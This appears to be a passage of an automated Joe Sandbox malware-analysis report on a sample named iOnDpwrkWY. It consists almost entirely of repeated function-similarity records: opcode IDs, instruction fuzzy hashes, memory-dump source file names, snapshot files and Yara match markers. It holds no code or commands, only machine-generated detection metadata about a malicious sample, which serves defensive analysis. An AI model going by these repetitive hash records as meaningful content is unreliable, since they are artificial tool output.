                                  • Instruction Fuzzy Hash: 4E322570614B198FC368CF29C58056ABBF1BF55710B648A2ED6A787F90D73AF984CB10
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5aa5d3a12128a26ed9c4319b3588af040b5452ee3ad61b5c13934a671167d9a8
                                  • Instruction ID: 1c03f4d1d9da4e588b7eb0090f71902aa376377d07fc1d7850242e2290c7d787
                                  • Opcode Fuzzy Hash: 5aa5d3a12128a26ed9c4319b3588af040b5452ee3ad61b5c13934a671167d9a8
                                  • Instruction Fuzzy Hash: 02322470914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB18
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
                                  • Instruction ID: ac4c237bba794a589b22dd731060a1855841f9f62452b379a30612aac1782491
                                  • Opcode Fuzzy Hash: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
                                  • Instruction Fuzzy Hash: 34023871A083128BC724CF28C4916ABB7F1EFE5314F19892CE8C99B391E738D945C786
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
                                  • Instruction ID: ba4386b7c12eba82c1b0c1a845e92ae21c1426ac82d7aa641ba094e7d1c8bfda
                                  • Opcode Fuzzy Hash: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
                                  • Instruction Fuzzy Hash: FE021671A083128BC724CF28C4A16ABB7F1EFE5350F19852DE8C99B351E7389D85C786
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e82c242e154504476aa0c4a283c83f7abe834146c9a10b5b44774a429600f0af
                                  • Instruction ID: 84e79ccb9cc00d90aa2bd8c79b6fba860a5d0c4f98912b4de5e341aa29604f95
                                  • Opcode Fuzzy Hash: e82c242e154504476aa0c4a283c83f7abe834146c9a10b5b44774a429600f0af
                                  • Instruction Fuzzy Hash: 61F114B1E002258BCF24CF58C8616EBB7B2FF85320F198199D896AF755E7349C42CB91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
                                  • Instruction ID: 8cc232c379ab24ad0e8e110b9e0577a2d66b898ca13c535210c4519ca42de900
                                  • Opcode Fuzzy Hash: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
                                  • Instruction Fuzzy Hash: ACF12771E003258BCF24CF58C8516ABB7B2FF95314F198199D896AF355E7389C41CB94
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                  • Instruction ID: 507db6f7c037cc6e9e0ec77a1d0df4f175d0fc6146ccb66f1ea9f1119004cf5b
                                  • Opcode Fuzzy Hash: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                  • Instruction Fuzzy Hash: 71F1BB356087458FC724CF29C881B6BFBE6AFD9300F08882CE6D587351E635E845CB92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a69080f6ad1e69bdb89b54cb009ba2c83e518309b21ccd4fa82cf12907931cd9
                                  • Instruction ID: bb9b723667839a33c3fd076cb6daf547bf5b8942c047ca41cb9a19f1e1e822b5
                                  • Opcode Fuzzy Hash: a69080f6ad1e69bdb89b54cb009ba2c83e518309b21ccd4fa82cf12907931cd9
                                  • Instruction Fuzzy Hash: A3F1CC356087418FD724CF29C88066BFBE2EFD9300F08882EE5D597391E679E944CB96
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                  • Instruction ID: 6296fb11866de40f5dd496054aeebb84a2d728ebdb5819372fa2057117352185
                                  • Opcode Fuzzy Hash: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                  • Instruction Fuzzy Hash: 9C129D61608BC28ED315CA3D8848756BFD26B66224F1CC79DD0F94B3D3C27AD546C7A2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                  • Instruction ID: 6af0af9fd07dbea0327a8a302486079f3e258e751aa577ffaaa1b30c4ee5c47c
                                  • Opcode Fuzzy Hash: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                  • Instruction Fuzzy Hash: 5B129D61608BC28ED315CA3C8848756BFD16BA6228F1CC79DD0F94B3D3C27A9546C7A2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                  • Instruction ID: 473c7c0e01890161c42436878ad5ddc7d20691f55e5b146572409273c410520a
                                  • Opcode Fuzzy Hash: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                  • Instruction Fuzzy Hash: CAD1F575609700DBD3209F15D8417EBB3A5FFD6354F184A6EE8C98B391EB389840C79A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1cec13f25c1f28221c4ff8f3f288699f7ddc068973911e15d4e3164317524c23
                                  • Instruction ID: 870af421b612b23560331f42c42a25c7619ada364a03c7a591dfab3374d6f7c9
                                  • Opcode Fuzzy Hash: 1cec13f25c1f28221c4ff8f3f288699f7ddc068973911e15d4e3164317524c23
                                  • Instruction Fuzzy Hash: B6B18776A047549FD3248F99E880ABFB7D2FB99310F1D993DC4C2A7291CB349C04879A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 91e403f7bf2fe428c8ff2ae1696841098b740060b83e87f0c1d5348c1599076f
                                  • Instruction ID: 2d1f1d5f385fc9d8a139eb3cf1d5ce0e42468934930e2d697a6a22a5c4dafbf7
                                  • Opcode Fuzzy Hash: 91e403f7bf2fe428c8ff2ae1696841098b740060b83e87f0c1d5348c1599076f
                                  • Instruction Fuzzy Hash: 4CB116B16482558BEB18CF28C852AFB77A2EF91344F19853DE885CB381E735DD498391
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: acc099de19a44bf00ce16e18c4be42564cbb2e2978226dbcdc14d31531569d8c
                                  • Instruction ID: 0d04b2c2fa50837e9638c4fbed55210e4b06bf37a5b46dbaee5e4e245b9bea77
                                  • Opcode Fuzzy Hash: acc099de19a44bf00ce16e18c4be42564cbb2e2978226dbcdc14d31531569d8c
                                  • Instruction Fuzzy Hash: 91B15C717043614BEB18DF24E85266B77A2EB81304F5AC53EE8859B386D63CDC09C79A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
                                  • Instruction ID: 6d87e0e3566e52f586671b0cf3e6892246311fbac07d7f7867258808785ed7ec
                                  • Opcode Fuzzy Hash: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
                                  • Instruction Fuzzy Hash: 98F1CFF0914B40AFD3A5CF3AC942797BEECEB4A360F14491EF5AEC2241D73165458BA2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
                                  • Instruction ID: c845803a38f6c77acddbfa9eef1216980ece3764384c33bb2f9187d8778c445e
                                  • Opcode Fuzzy Hash: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
                                  • Instruction Fuzzy Hash: 2BF1C0F0904B40AFC3A5CF3AC942797BEECEB0A360F14491EF5AEC2241D73561458BA6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
                                  • Instruction ID: 45b93fb37049a609bba675e6312aea7bd898e12da6aee257907ea324de5f9ab3
                                  • Opcode Fuzzy Hash: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
                                  • Instruction Fuzzy Hash: A1023861508BC18ED3268B3C8848A16BFD26BA6224F0EC7DCD4E94F7E3C679D545C762
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
                                  • Instruction ID: 41c3e091da67547de47b3906f8a28cdcf4f9a35dde57214a1a091a27875e02c3
                                  • Opcode Fuzzy Hash: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
                                  • Instruction Fuzzy Hash: F0024861508BC18ED3268B3C8848A56BFD26BA6224F0DC79DD4E94F7E3C279D506C762
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
                                  • Instruction ID: 8f62d820d698011493e9b4d33d56c28701bf8a730f1a894cccb9041d930e3295
                                  • Opcode Fuzzy Hash: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
                                  • Instruction Fuzzy Hash: A4B148B5E00565CFCF10CF59E8417AEB7B1AF0A304F5A407AD899AB342D7399D01CBA9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 43a38f77119da688ac3ac81b48a3df6363d837cca15ab4ad9599a2e3d82993cc
                                  • Instruction ID: 48870440b2df8fc22204be17aa3260c19897c4428a1b01c8a98c84e0175cdd55
                                  • Opcode Fuzzy Hash: 43a38f77119da688ac3ac81b48a3df6363d837cca15ab4ad9599a2e3d82993cc
                                  • Instruction Fuzzy Hash: 7EB1D236A183629FC724CF2CD88096AB7F2EB99710F19853CEA8697365D7319C41DB81
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
                                  • Instruction ID: 3d8e549ead381eb5a41ee94ce64dad1362128fe91ea456cb5e2966e39e4c66ca
                                  • Opcode Fuzzy Hash: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
                                  • Instruction Fuzzy Hash: A3B12536A083129BC724CF28C88056BB7E2FF99700F19953DEA8697366E735DC06D785
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3c637dafc4c5c02bba21bf8384fb5f02d2acdfb7e2cfb5a4e70ebd11587584d3
                                  • Instruction ID: 57a3ddbe486eddeaa6c20bcb5d8bc4e7390b1cfae717bd71ef5d0a99f560a1ee
                                  • Opcode Fuzzy Hash: 3c637dafc4c5c02bba21bf8384fb5f02d2acdfb7e2cfb5a4e70ebd11587584d3
                                  • Instruction Fuzzy Hash: 91B1BF76908301AFD7209F24EC41B1ABBE2BF94350F158E3CF498A72A1D7739925DB42
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 98cb35be4dcf6147bb54d841e08aa9a7e406920ae8f199def00657b733b42f8a
                                  • Instruction ID: 8a51dd8e2965cc9f0c4013a2f6a7698077ed2e8ce9dcff126952d1e9ceec8530
                                  • Opcode Fuzzy Hash: 98cb35be4dcf6147bb54d841e08aa9a7e406920ae8f199def00657b733b42f8a
                                  • Instruction Fuzzy Hash: EFB15579904301AFDB108F25DC41B5ABBE2BFD8314F144A3EF898932A1D776DD668B06
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd71efafbe3cc21deb18af7b1feb0adcacd6565e9113104d404282071b8f505b
                                  • Instruction ID: 54b75b6c93e664936ed93556ac6a08e932be5e6718721175f1b1559e446b96e4
                                  • Opcode Fuzzy Hash: dd71efafbe3cc21deb18af7b1feb0adcacd6565e9113104d404282071b8f505b
                                  • Instruction Fuzzy Hash: D39122B2A043019BD7249F24C892BBBB3B5EFD1314F08482CE9969B380E775EC54C796
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                  • Instruction ID: a24f2a78553098ad8a5e3b5bc8abd089333314a4ae9ebed43d08ec28266042c4
                                  • Opcode Fuzzy Hash: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                  • Instruction Fuzzy Hash: 9D9126B1B04321ABD7209F20DD91B77B3A5EF91318F14482DE9869B381E7B9E904C75A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d66196a234f06480f41816911af9b4ea699047e9e12ae4b8e975acb0d7698cc7
                                  • Instruction ID: 58cfb46aba403860c72f3c790a0d128e3c91ff3050a3f4c2698aa5f4054076aa
                                  • Opcode Fuzzy Hash: d66196a234f06480f41816911af9b4ea699047e9e12ae4b8e975acb0d7698cc7
                                  • Instruction Fuzzy Hash: 18A1F4729183128BC324CF24D8906ABB7E1FFD4754F1A8A2DE8C59B7A4E7349D41C781
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 73df037b7ed471f27b11ebbe38ccb4fbfbef165bc0754b8ed2e20a33442e0b7b
                                  • Instruction ID: 358f015ac3a892acacc5c317c69fcb817b75d0140d2ddb800d3265fd6a5e7145
                                  • Opcode Fuzzy Hash: 73df037b7ed471f27b11ebbe38ccb4fbfbef165bc0754b8ed2e20a33442e0b7b
                                  • Instruction Fuzzy Hash: 7EA1BD366042218FC718DF2CE99096BB3F2EB99710F1A857CE9869B255EB31EC41DB41
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                  • Instruction ID: c273f80db2c68c72cd83782caf32083e881c30074eac8ac1a84c91aaef4bd94c
                                  • Opcode Fuzzy Hash: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                  • Instruction Fuzzy Hash: D9C14DB29487458FC360CF68CC96BABB7E1FF85318F08492DD2D9C6242D778A155CB46
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                  • Instruction ID: afe5d4654f5e8657962bc42cc500043a3620e9a043509faccf93fb76782c58a6
                                  • Opcode Fuzzy Hash: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                  • Instruction Fuzzy Hash: DBC15BB29087418FC360CF28DC96BABB7F1BF85318F09492DD1DAD6242E778A155CB46
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eca7b8087cccba19e5979cf0e8330dd1936bd6a3fecaafeec36cf51b3ab145d2
                                  • Instruction ID: 652f8e9b795bdad566c10a3835dfc4d237c9f110778e3a4e594c84154d78986c
                                  • Opcode Fuzzy Hash: eca7b8087cccba19e5979cf0e8330dd1936bd6a3fecaafeec36cf51b3ab145d2
                                  • Instruction Fuzzy Hash: 43914C72754B1A4BC714DE6CDC9066EB6D2ABD4210F4D423CD8958B3C2EF78AD0587C5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
                                  • Instruction ID: 89cd8c3f6ac805753dcfa7ea52abb159a623b373aaffce4ab273b97bd3830c78
                                  • Opcode Fuzzy Hash: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
                                  • Instruction Fuzzy Hash: CFB10575608790DFD714DF24E891A2BB7E2EF8A314F488A6DF0D5872A2D7388905CB16
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2bb226d847c6d85160f6813aeae79ffa1446c0b5c4b11e29441bf99546017c60
                                  • Instruction ID: 01c5227460b1893c834f10708f7c40e6be9f18d07a4a94c3be0de9a79d32d4df
                                  • Opcode Fuzzy Hash: 2bb226d847c6d85160f6813aeae79ffa1446c0b5c4b11e29441bf99546017c60
                                  • Instruction Fuzzy Hash: 7D8158366043219FC7289F2CE95097BB7B2EFD4710F2A853CEA868B255EB309C51D781
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
                                  • Instruction ID: cf6a0fb400f3c0121e69896af41eb3d2a2b4280c5d577effd33442f2baf9bc8c
                                  • Opcode Fuzzy Hash: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
                                  • Instruction Fuzzy Hash: CB81AE326053019BC7249F29C85067FB3A2FFC8710F2AD42DE9868B395EB349C52D785
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b868a3013f37864ed973b3668e501d643bc9a4679fe388745f9f5cf196745faa
                                  • Instruction ID: 89f6195e99432f37d3b62893f32b9cd11a23af09c0070f41cad99cce8114386b
                                  • Opcode Fuzzy Hash: b868a3013f37864ed973b3668e501d643bc9a4679fe388745f9f5cf196745faa
                                  • Instruction Fuzzy Hash: 935135307243609BE7149F2DE8946BFB7E2EB92320F28893CD4D5876A2D7709C41CB61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
